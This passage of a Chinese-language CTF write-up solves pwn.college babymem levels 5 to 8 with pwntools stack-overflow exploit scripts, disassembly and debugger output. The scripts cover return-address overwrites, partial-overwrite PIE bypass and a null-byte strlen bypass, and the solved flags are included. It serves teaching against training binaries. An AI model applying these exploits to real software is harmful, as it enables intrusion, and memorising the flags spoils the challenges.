  {
36
    v0 = __errno_location();
7 collapsed lines
37
    v1 = strerror(*v0);
38
    printf("ERROR: Failed to read input -- %s!\n", v1);
39
    exit(1);
40
  }
41
  puts("Goodbye!");
42
  return 0LL;
43
}

不写了不写了，和上一题思路一样，自己去调试查 win 地址和 padding 大小就好啦～

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-5-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(0x98, b"A") + p64(0x401A48)
32

33
INT32_MAX = str((2**31)).encode()
34

35
target.recvuntil(b"Number of payload records to send: ")
36
target.sendline(INT32_MAX)
37
target.recvuntil(b"Size of each payload record: ")
38
target.sendline(b"2")
39
target.sendline(payload)
40

41
target.recvall()

Flag

Flag: pwn.college{A2rdZkIDLVjvpTrAPvlwpllVi7m.0FO5IDL5cTNxgzW}

Level 6.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Write-up


4 collapsed lines
1
void __fastcall win_authed(int a1)
2
{
3
  int *v1; // rax
4
  char *v2; // rax
5
  int *v3; // rax
6
  char *v4; // rax
7

8
  if ( a1 == 0x1337 )
9
  {
10
    puts("You win! Here is your flag:");
11
    flag_fd_5715 = open("/flag", 0);
24 collapsed lines
12
    if ( flag_fd_5715 < 0 )
13
    {
14
      v1 = __errno_location();
15
      v2 = strerror(*v1);
16
      printf("\n  ERROR: Failed to open the flag -- %s!\n", v2);
17
      if ( geteuid() )
18
      {
19
        puts("  Your effective user id is not 0!");
20
        puts("  You must directly run the suid binary in order to have the correct permissions!");
21
      }
22
      exit(-1);
23
    }
24
    flag_length_5716 = read(flag_fd_5715, &flag_5714, 0x100uLL);
25
    if ( flag_length_5716 <= 0 )
26
    {
27
      v3 = __errno_location();
28
      v4 = strerror(*v3);
29
      printf("\n  ERROR: Failed to read the flag -- %s!\n", v4);
30
      exit(-1);
31
    }
32
    write(1, &flag_5714, flag_length_5716);
33
    puts("\n");
34
  }
35
}

思路是覆盖返回地址，返回到 win_authed。但是由于 win_authed 会先检查传入参数是否为 0x1337，匹配才给 flag，所以我们光返回到 win_authed 还不够。要么想办法传入参数 0x1337，要么返回到 if 判断之后的指令，直接跳过执行判断的部分。这里我们使用第二种方法。

1
void __fastcall win_authed(int a1)
2
{
3
  if ( a1 == 0x1337 ) { /* ... */ }
4
}

pwndbg> disass win_authed
Dump of assembler code for function win_authed:
1 collapsed line
   0x0000000000401987 <+0>: endbr64
   0x000000000040198b <+4>: push   rbp
   0x000000000040198c <+5>: mov    rbp,rsp
   0x000000000040198f <+8>: sub    rsp,0x10
   0x0000000000401993 <+12>: mov    DWORD PTR [rbp-0x4],edi
   0x0000000000401996 <+15>: cmp    DWORD PTR [rbp-0x4],0x1337
   0x000000000040199d <+22>: jne    0x401aa1 <win_authed+282>
   0x00000000004019a3 <+28>: lea    rdi,[rip+0x1746]        # 0x4030f0
   0x00000000004019aa <+35>: call   0x401110 <puts@plt>
   0x00000000004019af <+40>: mov    esi,0x0
55 collapsed lines
   0x00000000004019b4 <+45>: lea    rdi,[rip+0x1751]        # 0x40310c
   0x00000000004019bb <+52>: mov    eax,0x0
   0x00000000004019c0 <+57>: call   0x401170 <open@plt>
   0x00000000004019c5 <+62>: mov    DWORD PTR [rip+0x4675],eax        # 0x406040 <flag_fd.5715>
   0x00000000004019cb <+68>: mov    eax,DWORD PTR [rip+0x466f]        # 0x406040 <flag_fd.5715>
   0x00000000004019d1 <+74>: test   eax,eax
   0x00000000004019d3 <+76>: jns    0x401a22 <win_authed+155>
   0x00000000004019d5 <+78>: call   0x401100 <__errno_location@plt>
   0x00000000004019da <+83>: mov    eax,DWORD PTR [rax]
   0x00000000004019dc <+85>: mov    edi,eax
   0x00000000004019de <+87>: call   0x4011a0 <strerror@plt>
   0x00000000004019e3 <+92>: mov    rsi,rax
   0x00000000004019e6 <+95>: lea    rdi,[rip+0x172b]        # 0x403118
   0x00000000004019ed <+102>: mov    eax,0x0
   0x00000000004019f2 <+107>: call   0x401130 <printf@plt>
   0x00000000004019f7 <+112>: call   0x401140 <geteuid@plt>
   0x00000000004019fc <+117>: test   eax,eax
   0x00000000004019fe <+119>: je     0x401a18 <win_authed+145>
   0x0000000000401a00 <+121>: lea    rdi,[rip+0x1741]        # 0x403148
   0x0000000000401a07 <+128>: call   0x401110 <puts@plt>
   0x0000000000401a0c <+133>: lea    rdi,[rip+0x175d]        # 0x403170
   0x0000000000401a13 <+140>: call   0x401110 <puts@plt>
   0x0000000000401a18 <+145>: mov    edi,0xffffffff
   0x0000000000401a1d <+150>: call   0x401190 <exit@plt>
   0x0000000000401a22 <+155>: mov    eax,DWORD PTR [rip+0x4618]        # 0x406040 <flag_fd.5715>
   0x0000000000401a28 <+161>: mov    edx,0x100
   0x0000000000401a2d <+166>: lea    rsi,[rip+0x462c]        # 0x406060 <flag.5714>
   0x0000000000401a34 <+173>: mov    edi,eax
   0x0000000000401a36 <+175>: call   0x401150 <read@plt>
   0x0000000000401a3b <+180>: mov    DWORD PTR [rip+0x471f],eax        # 0x406160 <flag_length.5716>
   0x0000000000401a41 <+186>: mov    eax,DWORD PTR [rip+0x4719]        # 0x406160 <flag_length.5716>
   0x0000000000401a47 <+192>: test   eax,eax
   0x0000000000401a49 <+194>: jg     0x401a77 <win_authed+240>
   0x0000000000401a4b <+196>: call   0x401100 <__errno_location@plt>
   0x0000000000401a50 <+201>: mov    eax,DWORD PTR [rax]
   0x0000000000401a52 <+203>: mov    edi,eax
   0x0000000000401a54 <+205>: call   0x4011a0 <strerror@plt>
   0x0000000000401a59 <+210>: mov    rsi,rax
   0x0000000000401a5c <+213>: lea    rdi,[rip+0x1765]        # 0x4031c8
   0x0000000000401a63 <+220>: mov    eax,0x0
   0x0000000000401a68 <+225>: call   0x401130 <printf@plt>
   0x0000000000401a6d <+230>: mov    edi,0xffffffff
   0x0000000000401a72 <+235>: call   0x401190 <exit@plt>
   0x0000000000401a77 <+240>: mov    eax,DWORD PTR [rip+0x46e3]        # 0x406160 <flag_length.5716>
   0x0000000000401a7d <+246>: cdqe
   0x0000000000401a7f <+248>: mov    rdx,rax
   0x0000000000401a82 <+251>: lea    rsi,[rip+0x45d7]        # 0x406060 <flag.5714>
   0x0000000000401a89 <+258>: mov    edi,0x1
   0x0000000000401a8e <+263>: call   0x401120 <write@plt>
   0x0000000000401a93 <+268>: lea    rdi,[rip+0x1758]        # 0x4031f2
   0x0000000000401a9a <+275>: call   0x401110 <puts@plt>
   0x0000000000401a9f <+280>: jmp    0x401aa2 <win_authed+283>
   0x0000000000401aa1 <+282>: nop
   0x0000000000401aa2 <+283>: leave
   0x0000000000401aa3 <+284>: ret
End of assembler dump.
pwndbg>

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-6-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(0x58, b"A") + p64(0x4019A3)
32
payload_size = str(len(payload)).encode()
33

34
target.recvuntil(b"Payload size: ")
35
target.sendline(payload_size)
36
target.recvuntil("Send your payload")
37
target.send(payload)
38

39
target.recvall()

Flag

Flag: pwn.college{AusQ-DCHaivq4M4Tj9IZIsDv7m8.0VO5IDL5cTNxgzW}

Level 6.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Write-up

和上一题一样，只是需要计算一下 padding 大小和看一下返回到哪里，这里就不多赘述了。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, process, remote, gdb, p64
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-6-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug([elf.path], gdbscript=gdbscript)
23
        else:
24
            return process([elf.path])
25
    else:
26
        return remote(HOST, PORT)
27

28

29
target = launch()
30

31
payload = b"".ljust(0x88, b"A") + p64(0x401DB0)
32
payload_size = str(len(payload)).encode()
33

34
target.recvuntil(b"Payload size: ")
35
target.sendline(payload_size)
36
target.recvuntil("Send your payload")
37
target.send(payload)
38

39
target.recvall()

Flag

Flag: pwn.college{Mlgp6gl7Ogp1vkjstLEXXOSldEM.0FMwMDL5cTNxgzW}

Level 7.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!

Write-up

这题和前两题差不多，都是计算 padding 和覆盖返回地址，唯一的区别在于它启用了 PIE 保护，导致我们无法知道确切的返回地址。这里我们通过 Partial Write 的方式绕过 PIE。

Partial Write 利用了操作系统加载程序时总是将程序加载到随机的内存页，通常内存页是 0x1000 字节，4 KB 对齐的，也就是说程序内部指令的偏移量都不可能超出这个范围，不够就分配到下一个内存页，比如 0x2000。所以开启了 PIE 的程序，尽管每次运行都被分配到不同的内存页，但它们在内存页中的偏移地址，也就是最后 3 nibbles 始终是相同的。利用这一点，我们只需要覆盖这最后 3 nibbles 即可达到控制返回地址的效果。

但由于我们没办法写入半个字节，所以我们需要猜一个 nibble，范围是 [0x0, 0xf]。将它和固定的 3 nibbles 组合输入到程序，如果地址匹配就成功跳转了。

下面看看开启 PIE 后的效果（每次运行都会随机分配基地址，但最后 3 nibbles 偏移地址始终是固定的）。

Run 1:

pwndbg> piebase
Calculated VA from /home/cub3y0nd/Projects/pwn.college/babymem-level-7-0 = 0x6123056c8000
pwndbg> i fun main
All functions matching regular expression "main":

Non-debugging symbols:
0x00006123056ca3c3  main
0x00007149f9ca4e40  __libc_start_main
0x00007149f9cb4b70  bindtextdomain
0x00007149f9cb4bb0  bind_textdomain_codeset
0x00007149f9cb86b0  textdomain
0x00007149f9d026c0  _IO_switch_to_main_wget_area
0x00007149f9d8e0b0  getdomainname
0x00007149f9d95d00  setdomainname
0x00007149f9da4b90  __getdomainname_chk
0x00007149f9db6940  __res_nquerydomain
0x00007149f9db6940  res_nquerydomain
0x00007149f9db69f0  __res_querydomain
0x00007149f9db69f0  res_querydomain
pwndbg> i fun challenge
All functions matching regular expression "challenge":

Non-debugging symbols:
0x00006123056c9d0b  challenge
pwndbg> i fun win_authed
All functions matching regular expression "win_authed":

Non-debugging symbols:
0x00006123056c9bee  win_authed
pwndbg>

Run 2:

pwndbg> piebase
Calculated VA from /home/cub3y0nd/Projects/pwn.college/babymem-level-7-0 = 0x622fffad3000
pwndbg> i fun main
All functions matching regular expression "main":

Non-debugging symbols:
0x0000622fffad53c3  main
0x0000781a2c3f4e40  __libc_start_main
0x0000781a2c404b70  bindtextdomain
0x0000781a2c404bb0  bind_textdomain_codeset
0x0000781a2c4086b0  textdomain
0x0000781a2c4526c0  _IO_switch_to_main_wget_area
0x0000781a2c4de0b0  getdomainname
0x0000781a2c4e5d00  setdomainname
0x0000781a2c4f4b90  __getdomainname_chk
0x0000781a2c506940  __res_nquerydomain
0x0000781a2c506940  res_nquerydomain
0x0000781a2c5069f0  __res_querydomain
0x0000781a2c5069f0  res_querydomain
pwndbg> i fun challenge
All functions matching regular expression "challenge":

Non-debugging symbols:
0x0000622fffad4d0b  challenge
pwndbg> i fun win_authed
All functions matching regular expression "win_authed":

Non-debugging symbols:
0x0000622fffad4bee  win_authed
pwndbg>

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, log, pause, process, random, remote, gdb
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-7-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug(
23
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
24
            )
25
        else:
26
            return process([elf.path] + (argv or []), env=envp)
27
    else:
28
        return remote(HOST, PORT)
29

30

31
padding_size = 0x38
32
fixed_offset = b"\x0a"
33
possible_bytes = [bytes([i]) for i in range(0x0C, 0x10C, 0x10)]
34

35

36
def send_payload(target, payload):
37
    try:
38
        payload_size = f"{len(payload)}".encode()
39
        target.recvuntil(b"Payload size: ")
40
        target.sendline(payload_size)
41
        target.recvuntil(b"Send your payload")
42
        target.send(payload)
43

44
        response = target.recvall()
45

46
        return b"You win!" in response
47
    except Exception as e:
48
        log.exception(f"An error occurred: {e}")
49

50
        return False
51

52

53
while True:
54
    try:
55
        target = launch()
56

57
        payload = b"A" * padding_size
58
        payload += fixed_offset + random.choice(possible_bytes)
59
        log.info(f"Trying payload: {payload.hex()}")
60

61
        if send_payload(target, payload):
62
            log.success("Success! Exiting...")
63

64
            pause()
65
            exit()
66
    except Exception as e:
67
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{0svlAHsYG0L-ONps0VQ3ssICrbb.0VMwMDL5cTNxgzW}

Level 7.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!

Write-up

和上一题一样的，这里就不多赘述了。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, log, pause, process, random, remote, gdb
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-7-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
c
13
"""
14

15

16
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
17
    if local:
18
        elf = ELF(FILE)
19
        context.binary = elf
20

21
        if debug:
22
            return gdb.debug(
23
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
24
            )
25
        else:
26
            return process([elf.path] + (argv or []), env=envp)
27
    else:
28
        return remote(HOST, PORT)
29

30

31
padding_size = 0x88
32
fixed_offset = b"\x3d"
33
possible_bytes = [bytes([i]) for i in range(0x08, 0x108, 0x10)]
34

35

36
def send_payload(target, payload):
37
    try:
38
        payload_size = f"{len(payload)}".encode()
39
        target.recvuntil(b"Payload size: ")
40
        target.sendline(payload_size)
41
        target.recvuntil(b"Send your payload")
42
        target.send(payload)
43

44
        response = target.recvall()
45

46
        return b"You win!" in response
47
    except Exception as e:
48
        log.exception(f"An error occurred: {e}")
49

50

51
while True:
52
    try:
53
        target = launch()
54

55
        payload = b"A" * padding_size
56
        payload += fixed_offset + random.choice(possible_bytes)
57
        log.info(f"Trying payload: {payload.hex()}")
58

59
        if send_payload(target, payload):
60
            log.success("Success! Exiting...")
61

62
            pause()
63
            exit()
64
    except Exception as e:
65
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{EC4bj1hO9Oo1kCMvjnoAdmOg2ed.0lMwMDL5cTNxgzW}

Level 8.0

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.

Write-up


4 collapsed lines
1
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
2
{
3
  int *v3; // rax
4
  char *v4; // rax
5
  _QWORD v6[3]; // [rsp+0h] [rbp-80h] BYREF
6
  int v7; // [rsp+1Ch] [rbp-64h]
7
  size_t size; // [rsp+28h] [rbp-58h] BYREF
8
  _QWORD v9[4]; // [rsp+30h] [rbp-50h] BYREF
9
  int v10; // [rsp+50h] [rbp-30h]
10
  char v11; // [rsp+54h] [rbp-2Ch]
11
  size_t v12; // [rsp+60h] [rbp-20h]
9 collapsed lines
12
  int v13; // [rsp+6Ch] [rbp-14h]
13
  void *buf; // [rsp+70h] [rbp-10h]
14
  void *dest; // [rsp+78h] [rbp-8h]
15
  __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF
16
  _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF
17

18
  v7 = a1;
19
  v6[2] = a2;
20
  v6[1] = a3;
21
  memset(v9, 0, sizeof(v9));
22
  v10 = 0;
23
  v11 = 0;
24
  dest = v9;
25
  size = 0LL;
26
  puts("The challenge() function has just been launched!");
27
  sp_ = (__int64)v6;
81 collapsed lines
28
  bp_ = (__int64)&savedregs;
29
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
30
  rp_ = (__int64)&retaddr;
31
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
32
  DUMP_STACK(sp_, sz_);
33
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
34
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
35
  puts("including the saved base pointer and the saved return address, for a");
36
  printf("total of %d bytes.\n", 8 * sz_);
37
  printf("The input buffer begins at %p, partway through the stack frame,\n", dest);
38
  puts("(\"above\" it in the stack are other local variables used by the function).");
39
  puts("Your input will be read into this buffer.");
40
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 37);
41
  puts("large input length, and thus overflow the buffer.\n");
42
  puts("In this level, there is no \"win\" variable.");
43
  puts("You will need to force the program to execute the win_authed() function");
44
  puts("by directly overflowing into the stored return address back to main,");
45
  printf(
46
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
47
    (const void *)rp_,
48
    rp_ - (_DWORD)dest);
49
  printf(
50
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
51
    rp_ - (_DWORD)dest + 8,
52
    37);
53
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)dest - 37);
54
  puts("and 8 that will overwrite the return address).\n");
55
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
56
  puts("- the canary is disabled, otherwise you would corrupt it before");
57
  puts("overwriting the return address, and the program would abort.");
58
  puts("Because the binary is position independent, you cannot know");
59
  puts("exactly where the win_authed() function is located.");
60
  puts("This means that it is not clear what should be written into the return address.\n");
61
  printf("Payload size: ");
62
  __isoc99_scanf("%lu", &size);
63
  printf("You have chosen to send %lu bytes of input!\n", size);
64
  printf("This will allow you to write from %p (the start of the input buffer)\n", dest);
65
  printf(
66
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
67
    (char *)dest + size,
68
    size - 37);
69
  printf("Of these, you will overwrite %d bytes into the return address.\n", size + (_DWORD)dest - rp_);
70
  puts("If that number is greater than 8, you will overwrite the entire return address.\n");
71
  puts("Overwriting the entire return address is fine when we know");
72
  puts("the whole address, but here, we only really know the last three nibbles.");
73
  puts("These nibbles never change, because pages are aligned to 0x1000.");
74
  puts("This gives us a workaround: we can overwrite the least significant byte");
75
  puts("of the saved return address, which we can know from debugging the binary,");
76
  puts("to retarget the return to main to any instruction that shares the other 7 bytes.");
77
  puts("Since that last byte will be constant between executions (due to page alignment),");
78
  puts("this will always work.");
79
  puts("If the address we want to redirect execution to is a bit farther away from");
80
  puts("the saved return address, and we need to write two bytes, then one of those");
81
  puts("nibbles (the fourth least-significant one) will be a guess, and it will be");
82
  puts("incorrect 15 of 16 times.");
83
  puts("This is okay: we can just run our exploit a few times until it works");
84
  puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times).");
85
  puts("One caveat in this challenge is that the win_authed() function must first auth:");
86
  puts("it only lets you win if you provide it with the argument 0x1337.");
87
  puts("Speifically, the win_authed() function looks something like:");
88
  puts("    void win_authed(int token)");
89
  puts("    {");
90
  puts("      if (token != 0x1337) return;");
91
  puts("      puts(\"You win! Here is your flag: \");");
92
  puts("      sendfile(1, open(\"/flag\", 0), 0, 256);");
93
  puts("      puts(\"\");");
94
  puts("    }");
95
  puts(byte_3F3B);
96
  puts("So how do you pass the check? There *is* a way, and we will cover it later,");
97
  puts("but for now, we will simply bypass it! You can overwrite the return address");
98
  puts("with *any* value (as long as it points to executable code), not just the start");
99
  puts("of functions. Let's overwrite past the token check in win!\n");
100
  puts("To do this, we will need to analyze the program with objdump, identify where");
101
  puts("the check is in the win_authed() function, find the address right after the check,");
102
  puts("and write that address over the saved return address.\n");
103
  puts("Go ahead and find this address now. When you're ready, input a buffer overflow");
104
  printf(
105
    "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n",
106
    (const void *)rp_,
107
    rp_ - (_DWORD)dest);
108
  puts("with the correct value.\n");
109
  puts("This challenge is careful about reading your input: it will allocate a correctly-sized temporary");
110
  puts("buffer on the heap, and then copy the data over to the stack. Can you figure out a way to fool");
111
  puts("this technique and cause an overflow?");
112
  buf = malloc(size);
113
  if ( !buf )
114
    __assert_fail("tmp_input != 0", "/challenge/babymem-level-8-0.c", 0xC0u, "challenge");
115
  printf("Send your payload (up to %lu bytes)!\n", size);
116
  v13 = read(0, buf, size);
117
  puts("Checking length of received string...");
118
  v12 = strlen((const char *)buf);
119
  if ( v12 > 0x24 )
120
    __assert_fail("string_length < 37", "/challenge/babymem-level-8-0.c", 0xC5u, "challenge");
121
  printf(
122
    "Passed! We should have enough space for all %d bytes of it on the stack. Copying all %d received bytes!\n",
123
    v12,
124
    v13);
125
  memcpy(dest, buf, v13);
126
  if ( v13 < 0 )
127
  {
128
    v3 = __errno_location();
28 collapsed lines
129
    v4 = strerror(*v3);
130
    printf("ERROR: Failed to read input -- %s!\n", v4);
131
    exit(1);
132
  }
133
  printf("You sent %d bytes!\n", v13);
134
  puts("Let's see what happened with the stack:\n");
135
  DUMP_STACK(sp_, sz_);
136
  puts("The program's memory status:");
137
  printf("- the input buffer starts at %p\n", dest);
138
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
139
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
140
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
141
  printf("- the address of win_authed() is %p.\n", win_authed);
142
  putchar(10);
143
  puts("If you have managed to overwrite the return address with the correct value,");
144
  puts("challenge() will jump straight to win_authed() when it returns.");
145
  printf("Let's try it now!\n\n");
146
  if ( (unsigned __int64)dest + v13 > rp_ + 2 )
147
  {
148
    puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address.");
149
    puts("         This can still work, because I told you the correct address to use for");
150
    puts("         this execution, but you should not rely on that information.");
151
    puts("         You can solve this challenge by only overwriting two bytes!");
152
    puts("         ");
153
  }
154
  puts("Goodbye!");
155
  return 0LL;
156
}

我们知道 memcpy 会把我们输入的数据从 buf 复制到 dest，具体复制多少是根据 v13，也就是 read 到的大小决定的，那这就存在了缓冲出溢出问题了。所以思路是我们利用 memcpy 覆盖返回地址控制执行流。

内存我们正常分配就好，这里主要是得设法绕过 v12 > 0x24，也就是 payload 不能大于 36 bytes，很显然这是不现实的，覆盖返回段地址至少要 0x58 bytes。

注意到判断输入长度的函数是 strlen。这个函数根据 Null 字符 \x00 判断字符串是否结束。那么，如果我们在 payload 一开始就写一个 Null 字符，strlen 就会认为字符串长度为零，成功绕过判断。

19 collapsed lines
Breakpoint 1, 0x000055555555622f in challenge ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0x7fffffffd160 ◂— 0
 RBX  0x7fffffffe308 —▸ 0x7fffffffe6ba ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-8-0'
 RCX  0x55555555b2a0 ◂— 0xa /* '\n' */
 RDX  1
 RDI  0x7fffffffd160 ◂— 0
 RSI  0x55555555b2a0 ◂— 0xa /* '\n' */
 R8   0x64
 R9   0xffffffff
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7fffffffd1b0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0
 RSP  0x7fffffffd130 —▸ 0x7fffffffd160 ◂— 0
 RIP  0x55555555622f (challenge+1522) ◂— call 0x5555555551d0
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x55555555622f <challenge+1522>    call   memcpy@plt                  <memcpy@plt>
        dest: 0x7fffffffd160 ◂— 0
        src: 0x55555555b2a0 ◂— 0xa /* '\n' */
        n: 1

26 collapsed lines
   0x555555556234 <challenge+1527>    cmp    dword ptr [rbp - 0x14], 0
   0x555555556238 <challenge+1531>    jns    challenge+1577              <challenge+1577>

   0x55555555623a <challenge+1533>    call   __errno_location@plt        <__errno_location@plt>

   0x55555555623f <challenge+1538>    mov    eax, dword ptr [rax]
   0x555555556241 <challenge+1540>    mov    edi, eax
   0x555555556243 <challenge+1542>    call   strerror@plt                <strerror@plt>

   0x555555556248 <challenge+1547>    mov    rsi, rax
   0x55555555624b <challenge+1550>    lea    rdi, [rip + 0x21b6]     RDI => 0x555555558408 ◂— 'ERROR: Failed to read input -- %s!\n'
   0x555555556252 <challenge+1557>    mov    eax, 0                  EAX => 0
   0x555555556257 <challenge+1562>    call   printf@plt                  <printf@plt>
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp     0x7fffffffd130 —▸ 0x7fffffffd160 ◂— 0
01:0008│-078     0x7fffffffd138 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f0 ◂— 'SHELL=/usr/bin/zsh'
02:0010│-070     0x7fffffffd140 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6ba ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-8-0'
03:0018│-068     0x7fffffffd148 ◂— 0x1f7e3070b
04:0020│-060     0x7fffffffd150 —▸ 0x555555558770 ◂— 0x2023232300232323 /* '###' */
05:0028│-058     0x7fffffffd158 ◂— 0x6eb
06:0030│ rax rdi 0x7fffffffd160 ◂— 0
07:0038│-048     0x7fffffffd168 ◂— 0
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x55555555622f challenge+1522
   1   0x55555555649b main+198
   2   0x7ffff7dcae08
   3   0x7ffff7dcaecc __libc_start_main+140
   4   0x55555555526e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> i frame
Stack level 0, frame at 0x7fffffffd1c0:
 rip = 0x55555555622f in challenge; saved rip = 0x55555555649b
 called by frame at 0x7fffffffe1f0
 Arglist at 0x7fffffffd1b0, args:
 Locals at 0x7fffffffd1b0, Previous frame's sp is 0x7fffffffd1c0
 Saved registers:
  rbp at 0x7fffffffd1b0, rip at 0x7fffffffd1b8
pwndbg> dist 0x7fffffffd160 0x7fffffffd1b8
0x7fffffffd160->0x7fffffffd1b8 is 0x58 bytes (0xb words)
pwndbg>

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, log, pause, process, random, remote, gdb
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-8-0"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+1421
13
b *challenge+1502
14
c
15
"""
16

17

18
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
19
    if local:
20
        elf = ELF(FILE)
21
        context.binary = elf
22

23
        if debug:
24
            return gdb.debug(
25
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
26
            )
27
        else:
28
            return process([elf.path] + (argv or []), env=envp)
29
    else:
30
        return remote(HOST, PORT)
31

32

33
null = b"\x00"
34
padding = b"".ljust(0x58 - 0x1, b"A")
35
fixed_offset = b"\x3c"
36
possible_bytes = [bytes([i]) for i in range(0x0B, 0x10B, 0x10)]
37

38

39
def send_payload(target, payload):
40
    try:
41
        payload_size = f"{len(payload)}".encode()
42
        target.recvuntil(b"Payload size: ")
43
        target.sendline(payload_size)
44
        target.recvuntil(b"Send your payload")
45
        target.send(payload)
46

47
        response = target.recvall()
48

49
        return b"You win!" in response
50
    except Exception as e:
51
        log.exception(f"An error occurred: {e}")
52

53

54
while True:
55
    try:
56
        target = launch(debug=False)
57

58
        payload = null + padding
59
        payload += fixed_offset + random.choice(possible_bytes)
60
        log.info(f"Trying payload: {payload.hex()}")
61

62
        if send_payload(target, payload):
63
            log.success("Success! Exiting...")
64

65
            pause()
66
            exit()
67
    except Exception as e:
68
        log.exception(f"An error occurred in main loop: {e}")

Flag

Flag: pwn.college{82SpQ2oiZjETn254hnZR69O97tP.01MwMDL5cTNxgzW}

Level 8.1

Information

Category: Pwn

Description

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.

Write-up

不多说，参考上一题。

Exploit

1
#!/usr/bin/python3
2

3
from pwn import context, ELF, log, pause, process, random, remote, gdb
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babymem-level-8-1"
8
HOST = "pwn.college"
9
PORT = 1337
10

11
gdbscript = """
12
b *challenge+259
13
b *challenge+326
14
c
15
"""
16

17

18
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
19
    if local:
20
        elf = ELF(FILE)
